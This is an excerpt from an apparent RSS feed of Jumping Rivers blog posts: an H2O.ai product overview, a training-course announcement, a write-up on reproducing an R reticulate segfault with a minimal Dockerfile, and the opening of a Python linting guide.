&lt;p&gt;H2O.ai are a company which say they are the visionary leaders in making AI accessible for everyone. Currently, they are the AI partner for over twenty thousand organisations including over half of the companies listed on the &lt;a href="https://fortune.com/fortune500/" rel="external"&gt;Fortune 500&lt;/a&gt; and are used by over one million data scientists around the world. They also have twenty of the world’s Kaggle Grandmasters (of which, at the point of writing, there are 262 in the world) working for their company showing the great talent they have working there.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-introduction-to-h2o"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="current-products"&gt;Current products&lt;/h2&gt;
&lt;p&gt;H2O.ai are an open-source company that supply both free and proprietary tools. As H2O.ai state that they are democratising machine learning and AI, they have a range of tools to aid everyone with the machine learning projects from idea to production, no matter their level of expertise. Below, you can read a short overview of the different tools that they provide.&lt;/p&gt;
&lt;h3 id="open-source-tools"&gt;Open source tools&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/products/h2o/" rel="external"&gt;H2O/H2O-3&lt;/a&gt;: H2O is a fully open source, distributed in-memory machine learning platform which is available in Python, R and various other languages. This is the main free offering from H2O.ai for undertaking machine learning tasks. H2O offers various different supervised and unsupervised algorithms, as well some other useful tools such as Word2vec. You can look at a full list of the different algorithms on offer &lt;a href="https://docs.h2o.ai/h2o/latest-stable/h2o-docs/data-science.html" rel="external"&gt;here&lt;/a&gt;. H2O also offers a tool called AutoML for automatic machine learning. This allows you to easily try out the different algorithms H2O offers and output a leader board showing which model has performed the best with your data. If you want to learn more about AutoML look at this &lt;a href="https://www.h2o.ai/blog/a-deep-dive-into-h2os-automl/" rel="external"&gt;blog post&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/products/h2o-wave/" rel="external"&gt;H2O Wave&lt;/a&gt;: H2O Wave is an open-source Python framework for designing and deploying applications with interactive user interfaces. It can be used to make &lt;a href="https://wave.h2o.ai/docs/getting-started" rel="external"&gt;simple applications&lt;/a&gt; such as to-do lists, or more complex applications where you can deploy your machine learning models that have been developed using H2O or H2O Driverless AI. If you have a spare hour and want to see how to get started with H2O Wave here is a useful &lt;a href="https://www.youtube.com/watch?v=alYWqXv8Sdg" rel="external"&gt;tutorial&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Example of a web application made by H2O Wave" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/introduction-to-h2o/h2owave.png" width="1814"&gt;
&lt;em&gt;Image taken from &lt;a href="https://wave.h2o.ai/" rel="external"&gt;H2O Wave homepage&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.h2o.ai/products/h2o-sparkling-water/" rel="external"&gt;Sparkling Water&lt;/a&gt;: If you are familiar with Apache Spark (the open source distributed, cluster computing framework used for big data), Sparkling Water is a tool which will allow you to implement advanced machine learning algorithms from H2O within your Spark implementations.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="propriety-tools"&gt;Propriety tools&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/ai-cloud/managed/" rel="external"&gt;H2O AI Cloud&lt;/a&gt;: If you are in need of cloud infrastructure, H2O.ai can now provide this with H2O AI Cloud. You can choose between a &lt;a href="https://www.h2o.ai/ai-cloud/managed/" rel="external"&gt;fully managed&lt;/a&gt; cloud infrastructure if you do not want to deal with setting up infrastructure, scaling, or software updates, or a &lt;a href="https://www.h2o.ai/ai-cloud/hybrid/" rel="external"&gt;hybrid&lt;/a&gt; cloud infrastructure if you want a little more control over your cloud environment.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/products/h2o-driverless-ai/" rel="external"&gt;H2O Driverless AI&lt;/a&gt;: Like H2O, this tool also offers automatic machine learning but this tool takes it a few steps further. As well as trying different machine learning algorithms (and ensembles of the available algorithms), this tool will also perform automatic feature engineering, produce data visualisations and post training diagnostics plots, and give performance metrics for each model; you can also easily deploy models that have been created and create model documentation. The tool is designed for both data scientists and non-data scientists. H2O.ai provide a user-friendly interface for this Driverless AI (which you can see below) so non-data scientists can easily load data, visualise the data, use the automatic machine learning algorithms to develop a model and evaluate the final result. Depending on a few metrics such as interoperability, time, and accuracy, different models will be used. For more technical users, you can control a large variety of parameters including over sampling techniques, particular parameter values to try in neural networks, the types of models to try, whether to perform early-stopping and much, much more. You can use Driverless AI on tabular data, time-series data, text data and image data to perform tasks such as prediction/classification tasks, forecasting, natural language processing and image classification. A full list of the different algorithms currently available can be seen &lt;a href="https://docs.h2o.ai/driverless-ai/latest-stable/docs/userguide/supported-algorithms.html" rel="external"&gt;here&lt;/a&gt;. If you want to add your own algorithms into the mix, such as custom neural networks, Driverless AI allows you to add your own models (for neural network fans both Tensorflow and Pytorch models can be added) as &amp;lsquo;custom recipes&amp;rsquo; to be used when trailing different algorithms. If you are interested in seeing how this tool is used here is a quick &lt;a href="https://www.youtube.com/watch?v=wcyMBRRLmqs" rel="external"&gt;demonstration&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="Example of Driverless AI user interface" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/introduction-to-h2o/driverlessai.png" width="1528"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/resources/product-brief/h2o-in-autodoc/" rel="external"&gt;H2O AutoDoc&lt;/a&gt;: AutoDoc allows you to create automatic model documentation for your models created in either H2O or Driverless AI (this feature is integrated into Driverless AI). You can also use this tool on any model you create using the Python library ScikitLearn. The documentation can be personalised to include the output that you think is most important, e.g. a confusion matrix, model performance metrics, etc. The document can be written to either a Microsoft Word file or a markdown script.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/resources/product-brief/h2o-mlops/" rel="external"&gt;H2O MLOps&lt;/a&gt;: If you are looking at putting your machine learning models into production this is where MLOps (machine learning operations) can help. H2O MLOps can be used to deploy models that you have created in both H2O and H2O Driverless AI and allows you to easily maintain them once they are in production. The tool uses &lt;a href="https://kubernetes.io/" rel="external"&gt;Kubernetes&lt;/a&gt; for easy deployment, scaling and management of your production and allows you to run diagnostics and update models without ever needing ‘down-time’.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/resources/product-brief/h2o-enterprise-puddle/" rel="external"&gt;H2O Enterprise Puddle&lt;/a&gt;: Enterprise Puddle is designed to help you easily create and manage H2O cloud instances. This tool is aimed at people who work within IT maintaining environments, permissions, data access, etc. rather than data scientists.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in trying out any of the above propriety tools (excluding Enterprise Puddle), H2O.ai are offering a free &lt;a href="https://www.h2o.ai/freetrial/" rel="external"&gt;90-day free trial&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="technical-features"&gt;Technical features&lt;/h2&gt;
&lt;p&gt;H2O.ai products are used for distributed in-memory machine learning platforms. They achieve this by distributing data across an H2O cluster and storing it in memory in a compressed format which allows for parallelisation. H2O.ai use Java as their main coding language. REST APIs are used to allow you to access and code in H2O products in languages such as R and Python so you can use H2O, H2O Wave, Sparkling Water and Driverless AI without needing to learn another coding language if you know R or Python!&lt;/p&gt;
&lt;p&gt;Another feature of H2O and H2O Driverless AI that you might find useful is any model created with either tool can be exported for later use. In H2O, a model can be exported as a hierarchical data format (HDF5) file, or a MOJO (model object, optimized) or a POJO (plain old java object), if you want to learn more about these different formats here is a useful &lt;a href="https://docs.h2o.ai/h2o/latest-stable/h2o-docs/productionizing.html#about-pojo-mojo" rel="external"&gt;link&lt;/a&gt;. In H2O Driverless AI you can export &amp;lsquo;Scoring Pipelines&amp;rsquo;. These can be used to deploy the models that you have developed within Driverless AI for production. They can be exported as either Python Scoring Pipelines, or MOJO Scoring Pipelines. Within the Python Scoring Pipeline an example Python script is added to show you how to use the pipeline in practice. If you would like to know more about exporting your Scoring Pipelines from Driverless AI take a look &lt;a href="https://docs.h2o.ai/driverless-ai/latest-stable/docs/userguide/python-mojo-pipelines.html" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Now you have read about H2O.ai and the tools that they provide, I hope that you have a better idea of what H2O.ai tools you could use for your machine learning projects. H2O.ai have created a set of tools which knit together nicely when used with each other. If you want to see how these tools are used in production, H2O.ai have a full section on their &lt;a href="https://www.h2o.ai/solutions/" rel="external"&gt;website&lt;/a&gt; dedicated to show use cases for their tools.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/introduction-to-h2o/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>New training courses</title><link>https://www.jumpingrivers.com/blog/june-training-update/</link><pubDate>Tue, 07 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/june-training-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/june-training-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/june-training-update/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The trainers here at Jumping Rivers have been busy developing a host of new courses for your programming pleasure! We have recently developed several new courses, which are now available to view on our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course list&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As well as R and Python, our new courses focus on two new tools: &lt;a href="https://h2o.ai/" rel="external"&gt;H2O.ai&lt;/a&gt; and &lt;a href="https://www.tableau.com/" rel="external"&gt;Tableau&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-june-training-overview"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="h2oai"&gt;H2O.ai&lt;/h3&gt;
&lt;p&gt;H2O.ai develop easy to use machine learning and AI tools. H2O Driverless AI is a tool which allows you to perform automatic machine learning without having to learn how to code, while H2O Wave allows you to develop real-time interactive web applications, without the need to learn any programming outside Python. Our introductory courses will show you how to use H2O Driverless AI to create, analyse and deploy machine learning models for your data, and how to use H2O Wave to develop an interactive web application to display data.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-driverlessai-machinelearning-automl-automated-machine-learning/" rel="external"&gt;Introduction to H2O Driverless AI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-driverlessai-machinelearning-automl-automated-machine-learning/" rel="external"&gt;Introduction to H2O Driverless AI Python Client&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-driverlessai-machinelearning-automl-automated-machine-learning/" rel="external"&gt;Introduction to H2O Driverless AI R Client&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/h2o-wave-web-application-visualisation/" rel="external"&gt;Introduction to H2O Wave&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="tableau"&gt;Tableau&lt;/h3&gt;
&lt;p&gt;Faster and more capable of handling larger datasets than Excel, Tableau is quickly becoming a valuable tool for individuals and organisations who want to leverage their data. It’s more user-friendly and simpler to learn than programming languages, but still allows a high-level of customisation. Tableau is more than just a simple data visualisation tool. It also gives people the capability to manipulate multiple data sources, create custom charts, build predictive models, and turn their plots into interactive dashboards and presentations. Introduction to Tableau will help you to get to grips with the basics of summarising and interactively visualising your data, while Data Exploration with Tableau will showcase what Tableau can do beyond basic data visualisation.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-to-tableau/" rel="external"&gt;Introduction to Tableau&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Data Exploration with Tableau&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;p&gt;We also have several new R courses. Text Mining in R will teach you the basics of manipulating and transforming text data as well as how to extract meaning and sentiment in R, using packages such as {stringr} and {tidytext}. In our one day Tidy Evaluation in R course, we introduce the {rlang} package as a way of parsing variables from a data set into a function, and cover environments and function-evaluation in R, to help you understand how the tools in {rlang} work under the hood. Object Oriented Programming in R will teach you what OOP is and the different varieties within R, beginning with the popular S3 and S4 OOP frameworks, and finishing with the new {R6} package that is used extensively in Shiny applications.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-text-mining-tidyverse-stringr-tidytext/" rel="external"&gt;Text Mining in R&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/tidy-evaluation-tidyverse-rlang-r/" rel="external"&gt;Tidy Evaluation in R&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/oop-s3-s4-r6-classes/" rel="external"&gt;Object Oriented Programming in R&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;p&gt;Writing code is all well and good, but writing code which is easy to read, simple to maintain, and reproducible is a challenge, especially under pressure. This course will show how we can make best practices second nature by incorporating them into our normal workflow.&lt;/p&gt;
&lt;p&gt;Our new courses are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-best-practices/" rel="external"&gt;Python Best Practices&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/june-training-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Creating a Reproducible Example</title><link>https://www.jumpingrivers.com/blog/creating-reproducible-example-r/</link><pubDate>Tue, 31 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/creating-reproducible-example-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/creating-reproducible-example-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="maintaining-training-materials"&gt;Maintaining training materials&lt;/h2&gt;
&lt;p&gt;Over the last few years, we increased both the number and types of
training courses we offer. In addition to our usual R courses in {dplyr}
and {shiny}, we also offer
&lt;a href="https://jumpingrivers.com/training/all-courses/" rel="external"&gt;training&lt;/a&gt; on Docker,
Python, Stan, TensorFlow, and others.&lt;/p&gt;
&lt;p&gt;As the number of courses we offer increased, so did the maintenance
burden of our associated training materials (lecture notes, slides,
exercises, and more). To ease this burden, and to assist in ensuring
that our training materials build consistently, we developed an R
package called {jrNotes2}. Amongst other things, this package ensures
that all courses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;have identical “template files”: &lt;code&gt;.gitlab-ci.yml&lt;/code&gt;, &lt;code&gt;.gitignore&lt;/code&gt;,
&lt;code&gt;Makefile&lt;/code&gt;s, &lt;code&gt;index.Rmd&lt;/code&gt;, …;&lt;/li&gt;
&lt;li&gt;have the same directory structure, and&lt;/li&gt;
&lt;li&gt;pass a set of quality-assurance checks.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To make a change to course content, a team member must push their
suggestions to a branch on GitLab. This action launches a CI job, which
runs a Docker container that performs a set of checks. The templated
&lt;code&gt;.gitlab-ci.yml&lt;/code&gt; file ensures that every course undergoes the same build
process and quality-assurance checks. If the content passes these
checks, &lt;em&gt;and&lt;/em&gt; an eligible approver approves the changes, then the
changes are merged into the main branch.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/2022-repex-blog.png" alt="Cartoon showing arrows from Data scientist to GitLab to Docker container to Continuous Integration" style="display: block; margin: auto;" /&gt;
&lt;p&gt;This means course content in a main branch should never fail our checks.
Well, not quite…&lt;/p&gt;
&lt;h2 id="why-we-cant-freeze-all-dependencies"&gt;Why we can’t freeze all dependencies&lt;/h2&gt;
&lt;p&gt;When teaching a course, we want to teach with the &lt;em&gt;exact same&lt;/em&gt; packages
an attendee would get via an &lt;code&gt;install.packages()&lt;/code&gt; or &lt;code&gt;pip install&lt;/code&gt;
command. This means we must always use the &lt;em&gt;latest&lt;/em&gt; versions of packages
available on CRAN and PyPI. However, always using the latest available
packages has it dangers: a change to a package used by a course can
suddenly cause our teaching materials to begin failing our build checks.&lt;/p&gt;
&lt;p&gt;To try and pre-empt package changes breaking our training materials we
use scheduled CI runs. That is, at regular intervals a CI job
automatically runs our tests and checks against a course’s training
materials. If a course’s materials fail these checks, we are notified
via a message in a Slack channel. Around early January, we started
getting notifications about our Introduction to Python course:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/slack.png" alt="Screenshot of slack notification showing the failed pipeline, where failed job is notes-build." style="display: block; margin: auto;" /&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-creating-reproducible-example-r"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-problem"&gt;The problem&lt;/h2&gt;
&lt;p&gt;Unfortunately, the traceback given by the CI wasn’t the most
enlightening:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/creating-reproducible-example-r/segfault.png" alt="segfault traceback screenshot" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Strangely, the course materials&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;built successfully on Colin’s laptop;&lt;/li&gt;
&lt;li&gt;failed to build on Jack’s laptop, and&lt;/li&gt;
&lt;li&gt;failed to build on the CI runner.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As far as we could see, everything appeared &lt;em&gt;roughly&lt;/em&gt; the same on all
three systems: with all three running the same operating system, the
same R version, and using the same package versions.&lt;/p&gt;
&lt;p&gt;Whilst we could reproduce the error in a docker container, the error was
difficult to debug as&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the container used a large number of internal Jumping Rivers R
packages;&lt;/li&gt;
&lt;li&gt;the materials build process involved a set of non-trivial Rmd files,
and&lt;/li&gt;
&lt;li&gt;the error wasn’t encountered until around eight minutes into the
build and test process.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, whilst we had a reproducible example of the error, it was only
reproducible by a Jumping Rivers employee, and it was &lt;em&gt;far&lt;/em&gt; from a
minimal example.&lt;/p&gt;
&lt;h2 id="simplifying-the-problem"&gt;Simplifying the problem&lt;/h2&gt;
&lt;p&gt;To make progress, we had to simplify the docker container. We asked
ourselves the following questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Can we remove all unnecessary files, such as presentation slides?
Yes.&lt;/li&gt;
&lt;li&gt;Can we simplify the course notes? Yes: we were able to find a single
Python code chunk that caused the issue.&lt;/li&gt;
&lt;li&gt;Can we remove all of our custom Rmd styling? Yes: a simpler Rmd file
with the same chunk gave the same error.&lt;/li&gt;
&lt;li&gt;Can we reproduce the issue without R Markdown? Yes: a simple R
script can reproduce the same error.&lt;/li&gt;
&lt;li&gt;Does the Dockerfile need to be complex? No: we can remove most of
the unnecessary Python, Debian and R related packages.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="a-minimal-reproducible-example"&gt;A minimal reproducible example&lt;/h2&gt;
&lt;p&gt;After all of our simplifications, we arrived at a &lt;em&gt;minimal&lt;/em&gt; reproducible
example with the Dockerfile:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rocker/r-ver:latest&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; apt update &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt install -y python3 python3-dev python3-venv&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; install2.r --error reticulate&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; test.R /root/&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and associated R script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reticulate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;virtualenv_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; envname &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;./venv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; packages &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;matplotlib&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reticulate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_virtualenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;./venv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reticulate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;py_run_string&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;import matplotlib.pyplot as plt; plt.plot([1, 2, 3], [1, 2, 3])&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By simplifying the problem, we were now in a position to ask for help
from others.&lt;/p&gt;
&lt;p&gt;As this appeared to be a bug (it used to work, but now it doesn’t), we
raised &lt;a href="https://github.com/rstudio/reticulate/issues/1133" rel="external"&gt;an issue against the
{reticulate}&lt;/a&gt;
repository.&lt;/p&gt;
&lt;h2 id="a-partial-solution"&gt;A (partial) solution&lt;/h2&gt;
&lt;p&gt;Soon after posting &lt;a href="https://github.com/rstudio/reticulate/issues/1133#issuecomment-1021783041" rel="external"&gt;we received a
response&lt;/a&gt;
from one of the {reticulate} developers. Their response revealed that
matplotlib was nothing but an innocent bystander in our issue, and that
the real culprits were the incompatible BLAS (Basic Linear Algebra
Subprograms) libraries being used by R and numpy!&lt;/p&gt;
&lt;p&gt;The suggested solution was to was compile the numpy package from source
within Docker. However, compiling numpy at container runtime added
around 3 minutes to the CI checks &lt;em&gt;every time&lt;/em&gt; they ran. As such, we
opted to build the numpy package from source at image &lt;em&gt;build-time&lt;/em&gt;,
effectively caching the package build, and avoiding re-compiling numpy
every time our build tests ran against our training materials.&lt;/p&gt;
&lt;p&gt;Although compiling numpy from source did fix our issue, it currently
presents as more of a workaround than a long-term solution. Hopefully, a
future change to the BLAS libraries used by the rocker image series or
numpy, can allow the two to be friends again. Here’s to hoping!&lt;/p&gt;
&lt;h2 id="take-aways"&gt;Take-aways&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Using scheduled CI jobs allowed us to catch this issue early, and
gave us plenty of time to fix it before the next time the course
ran.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Having a CI ensured we had an (internally) reproducible example, as
the CI is based on a docker container.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In order to get help, it was crucial to simplify the problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Debugging is hard, and it’s okay to ask for help!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/rstudio/reticulate/issues/1133" rel="external"&gt;https://github.com/rstudio/reticulate/issues/1133&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/creating-reproducible-example-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Stylising your Python code: An introduction to linting and formatting</title><link>https://www.jumpingrivers.com/blog/python-linting-guide/</link><pubDate>Thu, 26 May 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-linting-guide/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-linting-guide/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-linting-guide/code_quality.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://xkcd.com/1513" rel="external"&gt;https://xkcd.com/1513&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Linting is a process for identifying bugs and stylistic errors in your code. The process is carried out by analysis tools called &amp;rsquo;linters&amp;rsquo;, which are widely available for every major programming language. Linters will flag issues and style violations in your code, sort of like a spell checker!&lt;/p&gt;
&lt;p&gt;In addition to linters, there are a wide range of &amp;lsquo;auto-formatters&amp;rsquo; that can also carry out these checks, and even make the necessary changes for you.&lt;/p&gt;
&lt;p&gt;In this post we will provide an introductory overview of popular linters and auto-formatters for Python.&lt;/p&gt;
&lt;h2 id="why-should-i-care"&gt;Why should I care?&lt;/h2&gt;
&lt;p&gt;Put simply, linting helps to ensure that the format and style of your code adheres to the best coding practices. A nice thing about Python is that there is a clearly defined set of guidelines for code formatting and styling which most linters adhere to. These guidelines are laid out in &lt;a href="https://peps.python.org/pep-0008/" rel="external"&gt;PEP8&lt;/a&gt;, which is a Python Enhancement Proposal (PEP) written in 2001 to describe how Python developers can write readable and consistent code.&lt;/p&gt;
&lt;p&gt;Whether or not you intend to share your code, there are lots of reasons why you should care!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Readability&lt;/strong&gt;: It goes without saying that if you plan to share your code with colleagues or make it publicly available, it&amp;rsquo;s got to be readable. Even if you&amp;rsquo;re working on it solo, you will be thankful in the long-run that you took the time to write clear, logical code. This will save a lot of head-scratching when you return to it later!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Debugging&lt;/strong&gt;: A really nice feature of linters is the ability to flag bugs in your code without needing to run it (&lt;em&gt;static analysis&lt;/em&gt;). Plus, readable code is much easier to debug!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Consistency&lt;/strong&gt;: In a large coding project consisting of many scripts, it helps to use a consistent style throughout. This can be especially challenging when working with a large team. Incorporating linters into your workflow (pre-commit, etc) will be a big help!&lt;/p&gt;
